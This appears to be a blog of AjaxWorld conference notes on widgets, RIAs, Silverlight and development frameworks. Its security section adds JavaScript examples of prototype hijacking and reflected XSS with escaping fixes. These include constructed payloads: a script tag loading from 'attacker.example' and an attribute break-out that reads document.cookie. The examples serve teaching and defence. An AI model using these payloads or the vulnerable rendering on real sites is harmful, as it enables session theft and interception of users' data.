The Social Aggregator

Justin Thorp of Clearspring came to speak about Widgets and how the web is moving away from the “webpage”. He was pretty entertaining… he definitely had the “hip/cool” vibe going and did a lot of name-dropping of cool sites. His company has created a widget platform (built in Java) called Launchpad that is basically a mashup creator similar to iGoogle. He gave a statistic that 81% of all web users have seen a widget, and said that personalization will be more of a demand in the future.

He gave a few examples of sites that he thought were interesting:

buzzword alert!

Widget – “mini web apps placed inside other web apps.”

Opening Keynote – Day 3

Anthony Franco of effectiveui spoke in general about the future of RIAs.  A main point that he tried to get across was that Ajax isn’t something that should be used just for the sake of using it.  As developers, we need to make sure we figure out exactly what the client’s needs are and build our requirements off of that.  Ajax is supposed to be used to create more engaging user experiences – but it can sometimes lead to overkill.

I told you, there’s more!

Ok, so it took me a while to continue this blog since things are so busy around here… but I’m going to try to make this a part of my daily routine.  So, continuing on…

I gave my 2 cents at AjaxWorld and this is what they said…

DOH!

Ok, that’s not really what happened. But this is a real slide from one of the presenters speaking about a commercial application for building enterprise Web 2.0 applications – available from Nexaweb. I don’t have a lot to say about the application, but my first impression was that it was most likely lacking real-world usage… But you can download free demos from their site and decide for yourself, if you feel so inclined.

More to come…

The conference is over but I have a lot more to add.  They pretty much saved the best for last, so there’s a lot to cover.  So many PowerPoint slides, so little time…  Expect posts on these topics, and more, soon:

  • FLEX
  • Reverse Ajax
  • Widgets
  • New Ajax Standards
  • XQuery

Understanding Top Web 2.0 Security Attacks

One of the most eye-opening sessions of the conference so far has been this one on Web 2.0 security. The speaker, Danny Allan from Watchfire, an IBM company, was a fantastic speaker and one of the most engaging of the week. There are a lot of security risks in just about all rich internet applications on the web today, mostly due to the way the world wide web was built – there are all kinds of ways attackers can go after a web site to get at sensitive information. Why would they want that information? Almost always for financial gain.

He listed out 3 types of core attacks that may be used:

  1. Browser attacks: such as plugin flaws.
  2. Server-side attacks: the more traditional attacks, such as SQL injection.
  3. Client-side attacks: using XSS (cross-site scripting), CSRF, etc., attackers can take control of a user’s browser. He cited 108 distinct ways to exploit XSS.

The main technologies that are attacked are:

  1. Browsers
  2. Ajax
  3. Web Services

It’s also worth noting that mashups are especially difficult to protect. Because every widget on a mashup page runs in the same DOM, an attack in one widget can pull sensitive data out of the other widgets. It’s also difficult to know when that happens, because nothing in the DOM itself flags these sorts of attacks.

Other types of attacks he mentioned were JavaScript hijacking, prototype hijacking (an attacker replaces one of your JavaScript functions with their own), cache poisoning, DNS attacks, and DNS rebinding attacks.
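The prototype hijacking he described works because JavaScript objects share their methods through a mutable prototype that every script on the page can write to, including a script injected by XSS or shipped inside a third-party widget on a mashup. What follows is an added example, not code from the talk or from Watchfire: a minimal Ajax wrapper, an attacker script that wraps its shared send() so every request is copied out before being forwarded, and freezing the prototype as one mitigation. The `ApiClient` wrapper, the `bank.example` URL and the in-memory inboxes are constructed for the demo.

```javascript
// Added example: prototype hijacking of an Ajax client, and one mitigation.
// Node.js, no network: the application's endpoint and the attacker's collector are
// in-memory arrays so the leak is observable. All names here are constructed.

// The application's tiny Ajax wrapper. Every instance shares send() via the
// prototype, which is exactly why one write to that property affects every caller.
function makeApiClient(serverInbox) {
  function ApiClient(baseUrl) {
    this.baseUrl = baseUrl;
  }
  ApiClient.prototype.send = function (path, payload) {
    serverInbox.push({ url: this.baseUrl + path, payload });
    return { status: 200 };
  };
  return ApiClient;
}

// Attacker code running in the same page. It wraps the shared method: copy the
// payload to the attacker, then call the original so the application keeps working
// and nothing looks wrong. Returns true if the swap took effect.
function hijackSend(ApiClient, attackerInbox) {
  const original = ApiClient.prototype.send;
  const wrapped = function (path, payload) {
    attackerInbox.push({ path, payload });
    return original.call(this, path, payload);
  };
  try {
    // On a frozen prototype this assignment is silently ignored in sloppy mode
    // and throws a TypeError in strict mode; either way the swap fails.
    ApiClient.prototype.send = wrapped;
  } catch (e) {
    // strict-mode TypeError on a frozen prototype
  }
  return ApiClient.prototype.send === wrapped;
}

// Mitigation: freeze the prototype (and the constructor) before any untrusted
// script can run. This blocks later reassignment of send(); it does not help if the
// attacker's script ran first, and it does nothing for built-ins such as
// XMLHttpRequest.prototype unless those are frozen as well.
function harden(ApiClient) {
  Object.freeze(ApiClient.prototype);
  Object.freeze(ApiClient);
}

// Runs the scenario once, with or without the mitigation, and reports what happened.
function simulate({ hardened }) {
  const serverInbox = [];
  const attackerInbox = [];
  const ApiClient = makeApiClient(serverInbox);
  if (hardened) harden(ApiClient);
  const hijacked = hijackSend(ApiClient, attackerInbox);
  const client = new ApiClient('https://bank.example');
  client.send('/transfer', { to: 'acct-42', amount: 100 });
  return { hijacked, serverReceived: serverInbox.length, leaked: attackerInbox.length };
}

if (typeof require !== 'undefined' && require.main === module) {
  console.log('unprotected:', simulate({ hardened: false }));
  console.log('hardened:   ', simulate({ hardened: true }));
}
```

Note that in the unprotected run the server still receives exactly one request, which is the point: the hijack is invisible to the application and to the user, and only the attacker's copy reveals it. Load order is the real control; freezing buys nothing against a script that was already on the page before yours ran.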

He then proceeded to show us a demo of an XSS proxy which allowed him to gain control of a user’s bank information (not a real bank site) by pasting some malicious JavaScript code into the site’s search box and submitting it. Using the XSS proxy, he basically had a hacker admin panel that let him view all kinds of data he ‘stole’ from the user, including every link they clicked, every page viewed, all passwords and data typed into text fields, and basically anything sent through the browser you can think of. Since this was staged and just a demo, there were of course a lot of things that needed to be in place for it to work correctly, but the point is, it’s possible. One of the things I thought was really interesting is that he actually leveraged CSS (styles applied to links by their href) in his attack to gain access to this fake person’s data. Yikes!
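The injection vector in that demo, a search term echoed straight back into the results page, is the classic reflected XSS. The following is an added example, not the speaker’s demo code and not from Watchfire: a Node.js rendering of a search-results fragment done the vulnerable way and the hardened way, in both element context and attribute context. The payloads, the `attacker.example` host and the `q` parameter name are constructed for illustration.

```javascript
// Added example: reflected XSS through a search box, vulnerable vs. hardened rendering.
// Runs in Node.js with no DOM; the page fragments are built as strings the way a
// server-side template would build them. Payloads and attacker host are constructed.

// Vulnerable: the query is interpolated into HTML verbatim. Anything the user (or a
// link the user was tricked into clicking) puts in ?q= becomes markup.
function renderResultsVulnerable(query) {
  return `<h2>Results for: ${query}</h2>`;
}
function renderSearchBoxVulnerable(query) {
  return `<input name="q" value="${query}">`;
}

// Hardened: escape the five characters that can change meaning in HTML before
// interpolating. '&' goes first so the entities produced by the later replacements
// are not double-escaped. Because the attribute above is double-quoted, escaping the
// quote is what stops a payload from closing the value and adding on* handlers.
function escapeHtml(value) {
  return String(value)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}
function renderResultsSafe(query) {
  return `<h2>Results for: ${escapeHtml(query)}</h2>`;
}
function renderSearchBoxSafe(query) {
  return `<input name="q" value="${escapeHtml(query)}">`;
}

// Constructed payloads. The first loads an attacker-controlled script (the kind of
// XSS proxy stub the talk demonstrated); the second breaks out of the value attribute
// and adds an event handler, which needs no <script> tag at all.
const SCRIPT_PAYLOAD = '<script src="http://attacker.example/proxy.js"></script>';
const ATTRIBUTE_PAYLOAD = '" autofocus onfocus="alert(document.cookie)';

// Renders each payload in the context it targets so the two outputs can be compared.
function demo() {
  return {
    vulnerableResults: renderResultsVulnerable(SCRIPT_PAYLOAD),
    safeResults: renderResultsSafe(SCRIPT_PAYLOAD),
    vulnerableBox: renderSearchBoxVulnerable(ATTRIBUTE_PAYLOAD),
    safeBox: renderSearchBoxSafe(ATTRIBUTE_PAYLOAD),
  };
}

if (typeof require !== 'undefined' && require.main === module) {
  for (const [name, html] of Object.entries(demo())) {
    console.log(name + ': ' + html);
  }
}
```

In the browser the equivalent rule is to write untrusted text with `textContent` rather than `innerHTML`. Escaping is context-dependent: a value going into a URL, a JavaScript string or a CSS block needs a different encoder than the HTML one shown here, and no output encoding replaces a Content-Security-Policy that refuses to load scripts from hosts like the attacker's.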

Day 3 Kickoff

It’s another jam-packed 12 hour day here at the ajaxworld conference.  Looks like we have internet access for a bit so I may be posting through the day.

Spicing up user experience w/ Silverlight – Tech Session, Day 2

This session was probably the biggest disappointment of the conference so far… not that I really have a lot of high hopes for Microsoft’s RIA framework, but this was just ridiculous.  The speaker was not an employee of MS, so I’ll cut her some slack… but if her attitude towards the framework is any indication of the real motives behind Microsoft creating Silverlight, then they simply don’t get it.  Several times the speaker repeated the line “isn’t this cool!?” to the room full of dead-quiet developers.  Some guy spoke up, “Doesn’t Flash already do this?”.  Yeah, it’s basically exactly like Flash, except maybe more like Flash 4.  She was all excited about the drag-and-drop controls, most of which already exist in Flash (graphing, sliders, etc).  A lot of people, including myself, jumped out of there a few minutes early…

IDE + Framework Roundup 1

A few of the sessions that I’ve decided not to go into detail about were basically sales pitches (I’m using the term loosely – most of these are open source and free to use) for a development IDE or framework… here are a few of note:

  • Aptana Studio & “Jaxer” Ajax Server – This IDE has support for HTML, CSS, JavaScript, PHP, and Ruby on Rails. It’s interesting because it supports most of the popular JavaScript libraries (Prototype, Dojo, etc) and offers some pretty slick code completion. It also seems like a pretty swell IDE for the iPhone SDK (the speaker built a small web app for the iPhone in a matter of minutes). The Ajax server allows for server-side JavaScript.
  • jMaki – A mashup framework, in beta, created by Sun Microsystems. This seems to have a lot of potential. Basically they created wrappers for several popular JavaScript toolkits, which allows developers to use PHP, JSP, or whatever to embed the JavaScript code. It abstracts the event model of whichever JavaScript library you use into your language of choice. It is supported (with the help of plugins) in NetBeans, Eclipse, and Ant-based tools.
  • Webtop – Also created by Sun, Webtop is based on jMaki and is essentially an open source, extensible iGoogle clone.
  • ICEfaces – Java EE framework for building asynchronous, real-time social web applications.